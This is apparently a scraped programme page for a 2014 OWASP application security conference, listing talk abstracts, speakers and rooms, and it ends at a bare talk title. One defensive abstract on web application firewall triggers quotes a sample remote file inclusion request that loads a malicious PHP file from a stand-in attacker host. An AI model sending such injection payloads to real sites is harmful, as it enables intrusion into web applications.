Wednesday June 25, 2014 15:30 - 15:55 BST
LAB005 and LAB006

Break, ConfBreak, Afternoon

15:55 BST

Getting New Actionable Insights by Analyzing Web Application Firewall Triggers

ModSecurity Web Application Firewall was first released more than a decade ago, available as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and is the most widely deployed WAF, protecting millions of websites. A long side ModSecurity engine we can also find OWASP ModSecurity Core Rule Set (CRS), which is a library of generic application security signatures that provide a base level of protection for any web application.

In this presentation I will show an advanced technique for post processing of ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses that are derived from WAF triggers. The objective of the post processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights on our attackers and the techniques they use and as a result we can harden defenses that will improve our mitigations.

The presentation will include detailed description of several techniques with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example for analysis on remote file inclusion attack:

When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continues attack campaign that uses various RFI vulnerabilities with the same remote file.

Generating signature that matches attacks based on the attack "anchor" can improve the detection capabilities for ModSecurity CRS and at the same time give better insight on the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php

In the attack above we can see remote source file located on “www.attacker.com/malicous.php”, using this malicious file can be valuable when:

Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)

Blocking traffic from within the organization to the attacker web application

Correlating similar attacks as same distributed attack campaign

Speakers

Or Katz

Researcher, Akamai technologies

Or Katz is a security veteran, with years of experience at industry leading vendors, currently serves as principal lead security researcher for Akamai. Katz is a frequent Speaker in security conferences and published numerous articles, blogs and white papers on threat intelligence... Read More →

Wednesday June 25, 2014 15:55 - 16:45 BST
LAB003

Malware & Defence Track, ResMalDefend | Research, ResMalDefend

Company 64

15:55 BST

Getting a Handle on Mobile Security

Mobile development is one of the largest growth areas in all of software. The last decade has seen an explosion of mobile devices, operating systems, development environments, libraries, toolkits and app stores. Organizations are racing to construct mobile applications that harness the power of the mobile paradigm.

However, like in the early days of web development, security may be being overlooked or under-emphasized. In this talk, we will go through the array of mobile platforms available to developers, and discuss common security concerns that all platforms have in common. The talk will focuses on securing sensitive data on the phone, proper use of encryption, and proper use of TLS, along with several other security areas critical to writing secure mobile applications. A discussion of hybrid web apps, using frameworks like PhoneGap and the security concerns there, will also be discussed in detail.

Participants will gain an understanding of the key differences between web and mobile security, and learn what they must do to ensure they are architecting and constructing secure mobile applications.

Speakers

Jerry Hoff

VP, Static Code Analysis Division, WhiteHat Security

Jerry Hoff is the VP of the Static Code Analysis Division at WhiteHat Security. In addition to WhiteHat, he is a co-founder and managing partner at Infrared Security. Jerry has worked at a number of fortune ten financial firms, along with years of hands-on security consulting, where... Read More →

Wednesday June 25, 2014 15:55 - 16:45 BST
LAB002

Mobile Track, Mobile

Company 86

15:55 BST

OWASP - CISO Survey Report 2013 – Tactical Insights for Managers

Among application security stakeholders, Chief Information Security Officers (CISOs),are responsible for application security from governance, compliance and risk perspectives. The recently released OWASP CISO Survey provides tactical intelligence about security risks and best practices to help CISOs manage application security programs according to their own roles, responsibilities, perspectives and needs.

Speakers

Tobias Gondrom

Global Board Member, OWASP

Wednesday June 25, 2014 15:55 - 16:45 BST
LAB026

Security Management & Training Track, SecManTrain

Company 97

16:45 BST

Use of Netflow/IPFix Botnet Detection Tools to Determine Placement for Autonomous VM’s

This paper describes a novel method of autonomously detecting malicious Botnet behaviour within a Cloud datacentre, while at the same time managing Virtual Machine (VM) placement in accordance to its findings, and it presents its implementation with the Scala programming language. A key feature of this method, using output from Netflow/IPFix, both of which are capable of producing detailed network traffic logs, is its capability of detecting unusual Client behaviour through the analysis of individual data packet information.

It has been implemented as a module of an Autonomous Management Distributed System (AMDS) presented in [Dinita, R. I., Wilson, G., Winckles, A., Cirstea, M., Rowsell, T. (2013)], giving it direct access to all the VMs and Hypervisors on the Cloud network. As such, another key feature is that it can have an immediate and effective impact on network security in a Botnet attack context by issuing lockout commands to every networked VM through the AMDS. A proof of concept has been developed and is currently running successfully on the authors’ test bed.

Speakers

Razvan-Ioan Dinita

PhD research student and Lecturer, Anglia Ruskin University

Razvan-Ioan Dinita has received a degree in Computer Science and Internet Technology from Anglia Ruskin University of Cambridge, UK. He is currently a PhD research student in Cloud Computing and a Lecturer in Computer Science and Cloud Computing at Anglia Ruskin University. His research... Read More →

Wednesday June 25, 2014 16:45 - 17:35 BST
LAB003

Malware & Defence Track, ResMalDefend | Research, ResMalDefend

Company 96

16:45 BST

Wait, Wait! Don't pwn Me!

"Wait, wait! Don't pwn Me!" is a live, security news game show that pits three security experts (Josh Corman, Chris Eng and Space Rogue) against each other in a game of wits. Host Mark Miller, selects topics from the week's security news, posing the news items as limericks, fill-in-the-blank, and audience participation questions. The panel competes against each other, and the audience, for speed and accuracy when answering the questions.

During the AppSec USA 2013 Conference, this was a rollicking, high spirited session, exposing the prevalence of security issues highlighted in the main stream news. It demonstrates how hard it is to keep up to date with security updates, even for the experts. Audience members should come prepared as we test their knowledge against the panel, trying to determine what is real news and what is fake.

This is a fun filled session where panelists and audience members compete for prizes from the OWASP store. It is sure to put you in a good mood for the rest of the conference.

Speakers

Mark Miller

Senior Storyteller and DevSecOps Advocate, Sonatype

Wednesday June 25, 2014 16:45 - 17:35 BST
LAB002

Mobile Track, Mobile

Company 22

16:45 BST

PCI DSS and Secure Applications

The Payment Card Industry Data Security Standard (PCI DSS) applies to whether cardholder data is stored, processed or transmitted. This presentation will examine the best practices in development of bespoke or custom written applications to be used within the cardholder data environment of the Payment Card Industry Data Security Standard (PCI DSS) to ensure the applications meet the compliance requirements of the standard.

The objective of the talk is to inform those who are developing applications of the PCI DSS requirements, review the testing procedures that an auditor would use to examine compliance with the requirements and highlight the evidence the auditor will be expecting to collect to prove the requirements are being met continually. The purpose is to help them develop applications securely to the requirements.

The presentation starts with an explanation of the applicability of the PCI DSS and how organisations may not be aware that they need to comply with the requirements, as they may not be directly involved with payment card transactions. Often, payment card details can be captured on expense tracking systems, corporate card management and other systems. Anywhere the PAN is captured, stored, processed or transmitted, even when not directly involved in a payment transaction, the PCI DSS still applies. For web applications such as shopping carts, although the checkout may redirect to a 3rd party, the application performing the redirect needs to be secure to prevent the redirection mechanism being manipulated to point to a malicious 3rd party site.

Version 3 of the PCI DSS standard mandates a number of key best practices to ensure applications used provide the minimal level of protection of cardholder data during processing, storing and transmission of cardholder data.

The key practices that will be covered are:-
• Secure software development lifecycle practices that ensure the inclusion of security during the requirements definition, design, analysis, and testing phases of software development.
• Requiring developers to understand how cardholder data is handled in memory, and how modern malware will scrape memory to retrieve sensitive data.
• The use of separate development, testing and production environments; including separation of duties for developers, testers and production administrators.
• The need to remove test account credentials and test data from application before it is released to the production environment.
• Prohibition of the use of ‘live’ data for testing or development purposes.
• The use of change control mechanisms to ensure all changes to system components are reviewed and authorised.
• Software developers are trained in secure coding techniques and develop applications on secure coding guidelines.
• The testing of applications to ensure they do not suffer from known vulnerabilities.
• Public facing web applications are protected against known attacks.

Each of these key practices will be examined from the point of view of a PCI Qualified Security Assessor. The author, who is a QSA, will look at how industry standards, such as those developed by OWASP, can be used by developers, testers and managers as part of the process of implementing a secure development lifecycle and used as evidence in meeting the PCI DSS requirements.

The authors view on the key practices will be given, including interpretation of the requirements and how a QSA could expect to see them implemented to meet the testing requirements of the PCI DSS.

The result should be that developers will understand when the PCI DSS could apply to applications they are developing and the best practices they will need to follow to ensure those application meet the requirements of the PCI DSS. This will enable those merchants and service providers using the applications in their operations to achieve compliance.

Speakers

Geraint Williams

Senior Consultant & QSA, IT Governance

Wednesday June 25, 2014 16:45 - 17:35 BST
LAB026

Security Management & Training Track, SecManTrain

Company 51

17:35 BST

Keynote - CopperDroid: On the Reconstruction of Android Malware Behaviors

Today mobile devices and their application marketplaces drive the entire economy of the mobile landscape. For instance, Android platforms alone have produced staggering revenues exceeding 9 billion USD, which unfortunately attracts cybercriminals with malware now hitting the Android markets at an alarmingly rising pace.

To better understand this slew of threats, in this talk I present CopperDroid, an automatic VMI-based dynamic analysis system to reconstruct the behavior of Android malware. Based on the key observation that all interesting behaviors are eventually expressed through system calls, CopperDroid presents a novel unified analysis able to capture both low-level OS-specific and high-level Android-specific behaviors.

Extensive evaluation on more than 2,900 Android malware samples, show that CopperDroid faithfully describes OS- and Android-specific behaviors and, through the use of a simple yet effective app stimulation technique, successfully triggers and discloses additional behaviors on more than 60% (on average) of the analyzed malware samples, qualitatively improving code coverage of dynamic-based analyses.

Speakers

Lorenzo Cavallaro

Senior Lecturer (~Associate Professor), Royal Holloway, University of London

Lorenzo Cavallaro is a Senior Lecturer of Information Security in theInformation Security Group at Royal Holloway University of London.His research interests focus on systems security, and malware analysisand detection.Lorenzo is Principal Investigator on the 4-year EPSRC-funded BACCHUSgrant... Read More →

Wednesday June 25, 2014 17:35 - 18:20 BST
LAB026

Keynote

08:00 BST

Registration & Breakfast

Thursday June 26, 2014 08:00 - 09:00 BST
LAB001 Broad Street Entrance, Loed Ashcroft International Business Schoo

Registration

08:00 BST

Capture the Flag (Day 2 AM)

Volunteers

steven van der baan

Thursday June 26, 2014 08:00 - 13:30 BST
LAB027

Capture the Flag

09:15 BST

Keynote - Anonymous Communications and Tor: History and Future Challenges

The history of anonymous communications on the Internet dates back to the early 80's but since then there have been dramatic changes in how anonymous communication systems have been built and how they have been used. In this talk I will describe some of these key changes, and what has motivated them. These include the web taking over from email as the major means of communications, and users of anonymous communication systems prioritising censorship-resistance over privacy. The growing popularity of anonymous communication systems has also led to commercial and political realities effecting how projects are run and software is designed. In particular, I will discuss how the Tor software has changed, and the Tor project evolved in this environment. I will conclude by summarising what might be the future for anonymous communication systems and how they may have to adapt themselves to changing circumstances.

Speakers

Steven Murdoch

Royal Society University Research Fellow, University of Cambridge

Dr. Steven J. Murdoch is a Royal Society University Research Fellow in the Security Group of the University of Cambridge Computer Laboratory, working on developing metrics for security and privacy. His research interests include covert channels, banking security, anonymous communications... Read More →

Thursday June 26, 2014 09:15 - 10:00 BST
LAB026

Keynote

10:00 BST

Morning Coffee

Thursday June 26, 2014 10:00 - 10:25 BST
LAB005 and LAB006

Break, ConfBreak, Morning

10:25 BST

Chapter Leader Workshop 1

Join our newly appointed Community Manager, GK Southwick, as she talks you through the various concerns and questions you have regarding running your chapters. As the questions posed so far have been wide and varied, this will be an open format conversation, so bring your best and most baffling to the table and what GK can't answer straight, we'll discuss in the round.
Please bring your laptops, so we can walk through various steps and pages of the Wiki together, to ensure that everything is as clear as it can be.

Thursday June 26, 2014 10:25 - 11:15 BST
LAB109

Chapter Leaders Meeting

10:25 BST

DevOps, CI, APIs, Oh My!: Security Gone Agile

As the world of system and application deployment continues to change, the sys admins and security community are having to change with it. With agile development, continuous deployment, the pace of change in IT has only increased. After adding in Dev/Ops and cloud, the traditional sys admin and security processes just don’t work anymore. How can you rapidly deliver servers and applications while making sure they are built reliably and securely. When you are deploying multiple times a day, there is no time to fit in your traditional week long security assessment.

A new concept of Test Driven Security, which is loosely based on the tenants of Test Driven Development, is beginning to emerge in the application security community. This talk will cover how Matt is putting the practices in place currently at Rackspace and how you can architect your security work to be agile enough to keep up with the pace of change today. The talk will cover agile methods for securing infrastructure, apps & APIs and source code. Even if you are not there today, you will be soon enough. Its time to embrace the change and say "Challenge Accepted".

Speakers

Matt Tesauro

Senior AppSec Engineer, Duo Security

Thursday June 26, 2014 10:25 - 11:15 BST
LAB002

DevOps Track, DevOps

Company 78

10:25 BST

Hybrid Analysis Mapping: Making Security and Development Tools Play Nice Together

Developers want to write code and security testers want to break it and both groups have specialized tools supporting these goals. The problem is – security testers need to know more about application code to do better testing and developers need to be able to quickly address problems found by security testers. This presentation looks at both groups and their respective toolsets and explores ways they can help each other out.

Two different interactions are examined:
• How can knowledge of code make application scanning better?
• How can application scan results be mapped back to specific lines of code?

Using open source examples built on OWASP ZAP, ThreadFix and Eclipse, the presentation walks through the process of seeding web applications scans with knowledge gleaned from code analysis as well as the mapping of dynamic scan results to specific line of code. The end result is a combination of testing and remediation workflows that help both security testers and software developers be more effective. Particular attention is give to Java/JSP applications and Java/Spring applications and how teams using these frameworks can best benefit from these interactions.

Speakers

Dan Cornell

Vice President, Product Strategy, COALFIRE

A globally recognized software security expert, Dan Cornell has over 20 years of experience architecting, developing and securing software systems. As Vice President of Product Strategy at Coalfire, Dan works with customers and industry partners to help drive the direction of their... Read More →

Thursday June 26, 2014 10:25 - 11:15 BST
LAB003

DevOps Track, DevOps

Company 66

10:25 BST

OpenSAMM Best Practices: Lessons from the Trenches

Managing all application security activities as part of development and deployment of applications can be an overwhelming challenge. OWASP OpenSAMM gives you a structural and measurable blueprint to integrate OWASP best practices in your software life cycle. This OWASP framework allows you to formulate and implement a strategy for software security that is tailored to the risk profile of your organisation.

During this talk Bart and Sebastien will get you up to speed on the OpenSAMM framework and share their important challenges they faced in implementing the framework within various organisations. Important topics that will be covered during this presentation are:

What is the optimal OpenSAMM maturity level for your organisation?

At which level to implement OpenSAMM in the organisation: at company, business unit or development team level?

How to integrate OpenSAMM activities in agile development?

How to apply OpenSAMM on suppliers or outsourced development?

What metrics does OpenSAMM provide to manage your secure development life cycle?

Practical lessons learned and use cases from the trenches that make OWASP OpenSAMM a valuable methodology and which you should apply for your secure development life cycle!

Prior to the conference we organise a full day training on OpenSAMM, make sure to reserve your seat at this free OWASP training. After the conference the OpenSAMM project team comes together for their first OpenSAMM summit in Cambridge. If you want to contribute to this flagship project, stay and join us at the summit. More details on www.opensamm.org.

Speakers

Sebastien Deleersnyder

CEO, Toreon

Bart De Win

Thursday June 26, 2014 10:25 - 11:15 BST
LAB026

Frameworks and Theories Track, Frame

Company 72

11:15 BST

Warning Ahead: Security Storms are Brewing in Your JavaScript

JavaScript controls our lives – we use it to zoom in and out of a map, to automatically schedule doctor appointments and to play online games. But have we ever properly considered the security state of this scripting language?

Before dismissing the (in)security posture of JavaScript on the grounds of a client-side problem, consider the impact of JavaScript vulnerability exploitation to the enterprise: from stealing server-side data to infecting users with malware. Hackers are beginning to recognize this new playground and are quickly adding JavaScript exploitation tools to their Web attack arsenal.

In this talk we explore the vulnerabilities behind Javascript, including:
• A new class of vulnerabilities unique only to JavaScript
• Vulnerabilities in 3rd-party platforms which are exploited through JavaScript code
• HTML5 is considered the NG-Javascript. In turn, HTML5 introduces a new set of vulnerabilities

Speakers

Maty Siman

Founder and CTO, Checkmarx

Maty is the CTO and founder of Checkmarx. Maty has more than a decade of experience in software development, IT security and source-code analysis. Prior to founding Checkmarx, Maty worked for two years at the Israeli Prime Minister’s Office as a senior IT security expert and project... Read More →

Thursday June 26, 2014 11:15 - 12:05 BST
LAB002

Builder and Breaker Track, BuildBreak

Company 74

11:15 BST

Chapter Leader Workshop 2

Thursday June 26, 2014 11:15 - 12:05 BST
LAB109

Chapter Leaders Meeting

11:15 BST

Continuous Security Testing in a Devops World

Three key devops principles are the merging of skills in previously separate teams, extensive process automation and faster delivery through more frequent software deploys.

These present some interesting challenges to application security such as:

How to effectively communicate and manage security requirements in such a dynamic environment?

How to perform rigorous security testing when software is deployed multiple times per day?

How to integrate security processes into the existing continuous integration/deployment environments?

In this talk I will explore these questions and present an open source security testing framework that aims to address them through the use of Behaviour Driven Development (BDD).

A key concept from agile software development is that the software tests are the documentation. While this approach works well when all the stakeholders are developers, it can break down when neither the ops nor the security team are proficient in a programming language.

BDD offers a communication bridge between security, development and testing so that security requirements can be defined in a natural language; and yet still be executable as automated software tests.

The BDD-Security framework was created in order to provide a set of pre- defined security requirements that can be executed against most web applications with minimal changes. It uses Selenium and OWASP ZAP in order to mimic the testing that a human security tester would perform including authentication and access control tests that were previously difficult to automate and beyond the capabilities of scanners. Since the framework is based on JBehave, which provides JUnit wrappers, it fits into existing automated deployment and continuous integration pipelines.

The talk will demonstrate how to configure the BDD-Security framework and how to integrate it with the Jenkins CI server in order to provide continuous and in-depth security testing that includes both functional and non-functional testing.

The result is an automated process from code commit, to build, deploy and security testing where the results of the tests are understandable by all stakeholders.

Speakers

Stephen de Vries

Founder, CEO, Continuum Security SL

Stephen is the founder of Continuum Security and focussed on building AppSec tools to support security in the SDLC, including the IriusRisk threat modeling tool and BDD-Security open source security testing framework. His background is in software development and security testing... Read More →

Thursday June 26, 2014 11:15 - 12:05 BST
LAB003

DevOps Track, DevOps

11:15 BST

Making CSP Work For You

CSP is a valuable defence against XSS and other attacks on web applications. This talk provides an introduction to the technology, why it's needed, how it works and also provides some hints on overcoming a few of the challenges presented by using CSP in the real world.

Speakers

Mark Goodwin

Mark Goodwin works on application security for Mozilla, creators of the popular Firefox web browser (and CSP!). At work, Mark works with web applications and browser security. At home, he plays with the security too; web, phone apps, consumer electronics - all sorts. Mark has... Read More →

Thursday June 26, 2014 11:15 - 12:05 BST
LAB026

Frameworks and Theories Track, Frame

Company 15

12:05 BST

25 Million Flows Later – Large-scale Detection of DOM-based XSS

In recent years, the Web witnessed a move towards sophisticated client-side functionality. This shift caused a significant increase in complexity of deployed JavaScript code and thus, a proportional growth in potential client-side vulnerabilities, with DOM-based Cross-site Scripting being a high impact representative of such security issues.

In this paper, we present a fully automated system to detect and validate DOM-based XSS vulnerabilities, consisting of a taint-aware JavaScript engine and corresponding DOM implementation as well as a context-sensitive exploit generation approach. Using these components, we conducted a large-scale analysis of the Alexa top 5000. In this study, we identified 6167 unique vulnerabilities distributed over 480 domains, showing that 9,6% of the examined sites carry at least one DOM- based XSS problem.

Speakers

Martin Johns

Research Expert, SAP SE

Sebastian Lekies

Ben Stock

Thursday June 26, 2014 12:05 - 12:50 BST
LAB002

Builder and Breaker Track, BuildBreak

Company 58

12:05 BST

ActiveScan++: Augmenting manual testing with attack proxy plugins

This presentation will introduce ActiveScan++ and demonstrate how it can be used to easily identify complex vulnerabilities in real world applications. ActiveScan++ is an open source Python plugin that builds upon Burp Suite's basic active scanning functionality. This talk will cover the classic and exotic vulnerabilities it can detect, as well as the pros and pitfalls that can be found with the proxy-plugin approach to automated vulnerability hunting.

ActiveScan++ uses heuristic probes to efficiently assess the susceptibility of the target to a range of cutting edge attack techniques, such as host header poisoning and relative path overwrites. In addition, ActiveScan++ provides robust identification of blind attack issues, helping to locate rare but critical vulnerabilities such as code injection that pentesters can't afford to miss. Demonstrations of the underlying mechanics of these attacks, how they can be automatically detected, and how we can actively exploit them once they have been identified will be performed throughout the presentation.

The presentation will finish with a discussion of current research into automated detection of 'suspicious' behaviour, in a manner similar to the initial stages of manual testing. These new techniques allow generic detection of entire vulnerability classes by combining platform-independent payload sets with fuzzy pattern matching.

This presentation will host the first public release of this open source tool.

Speakers

James Kettle

Context Information Security

James Kettle has extensive experience vulnerability bounty hunting across Mozilla's and Google's heavily secured infrastructure, resulting in being ranked 6th in Google's 0x0A list for 2012/13. As part of this he has performed security research culminating in novel attack techniques... Read More →

Thursday June 26, 2014 12:05 - 12:50 BST
LAB003

Builder and Breaker Track, BuildBreak

Company 29

12:05 BST

Chapter Leader Workshop 3

Thursday June 26, 2014 12:05 - 12:50 BST
LAB109

Chapter Leaders Meeting

12:05 BST

Threat Modeling – A Brief History and the Unified Approach at Intuit

Threat Modeling is a software design analysis method that looks for security weaknesses by juxtaposing software design views against a set of attackers.

Software engineers and security practitioners at Intuit have been practicing Threat Modeling in various ways for years. Intuit has used a Threat Model methodology based on STRIDE. The approach had many advantages, but also some drawbacks. Some of the drawbacks included amount of time required to translate the information from development (generating the Data Flow Diagrams) and difficulty in modeling different threat agents.

Intuit and Cigital unified their two Threat Modeling methodologies to produce an approach that satisfies various stakeholders at Intuit. The result was what is called Unified Threat Modeling, an approach that consists of identifying assets and attacker profiles, and documenting and suggesting a list of controls. It works for software architecture and system deployments (using System Threat Modeling approach) as well as for interaction between different software and system components (via Protocol Threat Modeling approach).

Speakers

Scott Matsumoto

Principal Consultant, Cigital, Inc.

Scott Matsumoto is a Principal Consultant with Cigital. At Cigital, he is responsible for the mobile security practice within the company. He consults for many of Cigital’s clients on security architecture topics such as mobile security, Cloud Computing Security, as well as SOA... Read More →

Tin Zaw

Director, Security Solutions, Verizon

The author resides in sunny southern California, where he seeks a Zen state of mind amid the chaotic mix of technology, society and cyber threats. Wanting to make the world safer online, he gave up his beloved programming job to focus on cyber security. He is a former president of... Read More →

Thursday June 26, 2014 12:05 - 12:50 BST
LAB026

Frameworks and Theories Track, Frame

Company 35

12:50 BST

Lunch - Thursday 26th June

Thursday June 26, 2014 12:50 - 13:50 BST
LAB005 and LAB006

Lunch, LunchConference

13:30 BST

Capture the Flag (Day 2 PM)

Volunteers

steven van der baan

Thursday June 26, 2014 13:30 - 16:00 BST
LAB027

Capture the Flag

13:50 BST

Metro down the Tube. Security Testing Windows Store Apps

This presentation will cover “Metro”, “Modern” or (more correctly) “Windows Store” Apps and how to perform security reviews on them. Like it or not, this is the direction Microsoft are going in, and it seems likely that this style of centrally controlled, sandboxed application is the future for at least some types of Windows programs. The focus of the talk will be Store Apps developed in HTML and JavaScript (although other types of app will be mentioned). I will explain what a Store App is, and how it differs from a normal Windows application, and also from a web site.

In the first section I cover the architecture and theory of Store apps. I go over the different types of development frameworks which can be used to create them, and how they get from a developer’s PC to the Windows Store, including what Microsoft do (and don’t do) as far as security testing is concerned. I’ll also compare and contrast this type of apps with ones from other architectures (Win32 and mobile).

The second section of the presentation then explains (and shows) how to set up an environment (Windows 8.1, a web proxy of choice and Visual Studio) to test a Store application – there are some tricks to this which are not well publicised. I’ll point out where apps are stored, how you get access to them, and how to go about testing them including code review examples (focusing on secure and insecure JavaScript). I’ll show the use of a web service in an app and how this technology can present a security hole in the app sandbox.

In conclusion I will make some comments on where the move to a Store based system in the Windows environment (over 90% of PC class devices) is taking us from a security perspective, and how this fits (in my opinion) with the future development of Windows Phone and RT.

The presentation as a whole gives an introduction to an area of application testing which is not well known but is likely to become more critical as time advances and the Store system becomes more mature.

Speakers

Marion Mccune

Director, ScotSTS Ltd

I'm a director of a small security consultancy specializing in testing Web Applications. My specific fields of interest are ASP.NET, Store Apps and WP8. I live in rural Argyll with my partner Rory, two cats, three Surfaces and a visiting pine marten.

Thursday June 26, 2014 13:50 - 14:40 BST
LAB002

Builder and Breaker Track, BuildBreak

Company 28

13:50 BST

Barbican: Protect your Secrets at Scale

For sys admins, your servers hold many pieces of sensitive information, whether they are iron, virtual or cloud boxes. These keys to your kingdom need protection but must also also allow for infrastructure at scale. Application Security current best practices talk about key management, key rotation but have little to no practical advice beyond policy and general statements.

This presentation discusses a proposed solution for key management, named Barbican, an open source project that is part of OpenStack. Its goal was to build a secure, Cloud-ready key management solution. Barbican can be used by OpenStack implementors or anyone willing to run a server or two. This talk will walk through the current state of Barbican, its technical architecture, how to use it as an internal or cloud service and demonstrate our current proof of concept implementation.

Speakers

Matt Tesauro

Senior AppSec Engineer, Duo Security

Thursday June 26, 2014 13:50 - 14:40 BST
LAB003

DevOps Track, DevOps

Company 80

13:50 BST

A non-trivial task of Introducing Architecture Risk Analysis into the Software Development Process

Despite many publications and presentations detailing threat modeling and, more generally - Architectural Risk Analysis (ARA) techniques, and widely accepted notion that it is so much cheaper to deal with security issues proactively and upfront, rather than reactively in already released applications, many software development teams still have not embraced ARA as a mandatory part of their SDLC. Why is it so, if the benefits are so obvious? Because establishing ARA as a regularly practiced activity is a very complicated process, and existing industry materials and methodologies do not help development teams make this transition any smoother. This presentation, based on first-hand experiences and observations from introducing ARA into SDLC, will describe the many obstacles to broad adoption of ARA in a software development company as an integral element of regular product development cycle.

The reasons for the existing situation are plenty, ranging from mindset of software engineers, to lack of security-related culture, and to shortage of sufficiently skilled security professionals. Instead of trying to tackle these challenges, many companies aim to placate customers' security assurance demands by going down the easier route of "testing security in" and contract security verification out to external vendors. These problems may be attributed to inertia and general lack of understanding of how to write secure software.

Unfortunately, there are many problems with the threat modeling and ARA methodologies themselves, which complicate their adoption as proactive defense mechanisms. There are no commonly accepted methods to calculate Return on Investment (ROI) of such programs, and senior management, with very few exceptions, remain skeptical when asked to further burden already strained development teams. In the best case, they may tolerate it, but support is far from guaranteed. The concepts and skills, required for practicing those methodologies, remain foreign to regular developers, who have difficulties transitioning from functional into attacker mode of thinking. Broad developers education is challenging because the software industry as a whole has so far failed to produce any meaningful materials on attack patterns that could be relatively easily introduced into software development process. There are efforts under way, but some of them are too academic in nature, while others are way too broad and

inconsistent, making the end result unsuitable for practical applications. This stands in sharp contrast to the reactive mechanism of vulnerability alerts practice, which relies on well established and commonly used vulnerability data sources.

As a result, despite lots of talk about great importance of ARA, and quite a few years after introduction of the concept into the applied software development discipline it remains more of an art than a trade. ARA and threat modeling are still practiced by relatively small and exquisite groups of dedicated security professionals, either within Software Security Groups (SSGs) in large companies, or by highly specialized consultancies.

This presentation will look at the key ingredients necessary for establishing a successful ARA program in a software development organization, recognizing the limitations and obstacles described earlier. The process of bridging the current knowledge gap requires close cooperation of both development and security teams, so the presentation will be particularly useful for development managers and architects involved into implementation of SDLC within software development organizations, as well as application security professionals dealing with software development teams. Finally, we will also discuss specific examples of what is lacking in the currently available public materials for threat modeling/ARA and how this situation could be improved to make those materials more applicable as part of the regular software development process.

Speakers

Denis Pilipchuk

Senior Principal Security Program Manager, Global Product Security, Oracle Corporation

Mr. Pilipchuk is a Security Program Manager on the Oracle Global Product Security team. Denis works with all business units to develop security assurance programs, concentrating in the areas of Architectural Risk Analysis, security design, and security tools. He has previously held... Read More →

Thursday June 26, 2014 13:50 - 14:40 BST
LAB026

Frameworks and Theories Track, Frame

Company 32

14:05 BST

Project Leader Workshop

The Project Leader Workshop is a 2 hour event activity that brings together current and potential OWASP project leaders to discuss project related issues and topics. The Project Leader Workshop is an optional event activity for our leaders that takes on a presentation and discussion format. It is an interactive tool used to bring together project leaders from across the globe in an effort to have participants share valuable insights and recommendations with their fellow members.

Leaders can expect to learn more about the OWASP Projects Infrastructure, the benefits of having an OWASP Project, and how they can leverage the infrastructure to help promote their project to the community and beyond. OWASP Project Leader, Simon Bennetts, will lead the session

Please check attached file for location (MAP FLOOR)

Moderators

Johanna Curiel

Security Engineer and Researcher, Mobiquity

Speakers

Simon Bennetts

ZAP Project Lead, Jit

LAB 1st 2 pdf

Thursday June 26, 2014 14:05 - 16:10 BST
LAB109

ProjLead

14:40 BST

Can Application Security Training Make Developers Build Less Vulnerable Code?

This presentation shares the results of a yearlong survey of nearly 600 software developers that captures their knowledge of application security before and after formal training. The survey queries developers from various backgrounds and industries, to better understand their exposure to secure development concepts and to capture a baseline for post-training improvements.

The session also includes the results of a "retest" of a subset of respondents, to identify how much security knowledge they retained after a specific length of time. The results were surprising, and include information every application risk manager should know, particularly those who rely on training as part of an application security strategy.

Speakers

John Dickson

VP, Coalfire

John Dickson is an internationally recognized security leader, entrepreneur and Principal at Denim Group, Ltd. He has nearly 20 years hands-on experience in intrusion detection, network security and application security in the commercial, public and military sectors. As a Denim Group... Read More →

Thursday June 26, 2014 14:40 - 15:30 BST
LAB002

Builder and Breaker Track, BuildBreak

Company 85

14:40 BST

Freedom Issues for Websites

Web sites continually raise several issues of concern that affect individual users' freedom. As part of their design, such web sites often make users run nonfree software (perhaps in Javascript) whilst others collect data about people or help both commercial and clandestine entities to do so. Some websites may help do the user's own computing and thus deny users control over it. Dr Richard Stallman will speak about these problems and how to avoid them.

Speakers

Dr Richard Stallman

Dr Richard Stallman , President of the Free software FoundationDr. Richard Stallman launched the free software movement in 1983 and started the development of the GNU operating system (see www.gnu.org) in 1984. GNU is free software: everyone has the freedom to copy it and redistribute... Read More →

Thursday June 26, 2014 14:40 - 15:40 BST
LAB026

Special

Company 47

15:40 BST

Afternoon Coffee

Thursday June 26, 2014 15:40 - 16:00 BST
LAB005 and LAB006

Break, ConfBreak, Afternoon

16:00 BST

Automatic Detection of Inadequate Authorization Checks in Web Applications

Gaps in the enforcement of access control policy of a software system can lead to privilege escalation, allowing unauthorized access to sensitive resources and operations. We describe a novel technique to automatically detect missing and inconsistent authorization checks in web applications with static analysis and conclude with empirical results of using our approach on real-world applications.

The concept of granting different users different privileges dates back to early software systems. Gaps in the enforcement of access control policies can lead to privilege escalation, allowing unauthorized access to sensitive resources and operations. As software becomes more ubiquitous and is used for tasks ranging from shopping to scheduling doctor’s appointments, providing bulletproof access control remains an imperative.

Correct placement of authorization checks is a non-trivial task for developers that requires intimate knowledge of the system, its users, and their roles. These challenges are evidenced by the fact that missing authorization checks—like the one that allowed Bloomberg News to leak NetApps’s earnings results in 2010—are still among the most widespread and impactful vulnerabilities. Manually weeding out access control violations is cumbersome and requires a lot of expertise. Existing automated techniques are also inadequate and require either substantial human intervention or are effective only on very targeted code bases, such as operating systems.

This talk focuses on ensuring well-placed authorization checks in web applications. We discuss different ways access control requirements are specified in web applications, including configuration- and annotation-based approaches. Next, we describe a novel technique to automatically detect missing and inconsistent authorization checks. Our approach lets us detect missing checks statically rather than at runtime and allows us to provide remediation suggestions that allow developers to fix code before it goes to production.

We conclude with empirical results of our successful application of this approach to a number of real-world web applications. We discuss the classes of issues we found and review specific examples to shed light on the kinds of authorization mistakes developers are making today.

Speakers

Alvaro Muñoz

Software Security Researcher, HP

Thursday June 26, 2014 16:00 - 16:50 BST
LAB002

Builder and Breaker Track, BuildBreak

Company 60

16:00 BST

Shameful Secrets of Proprietary Network Protocols

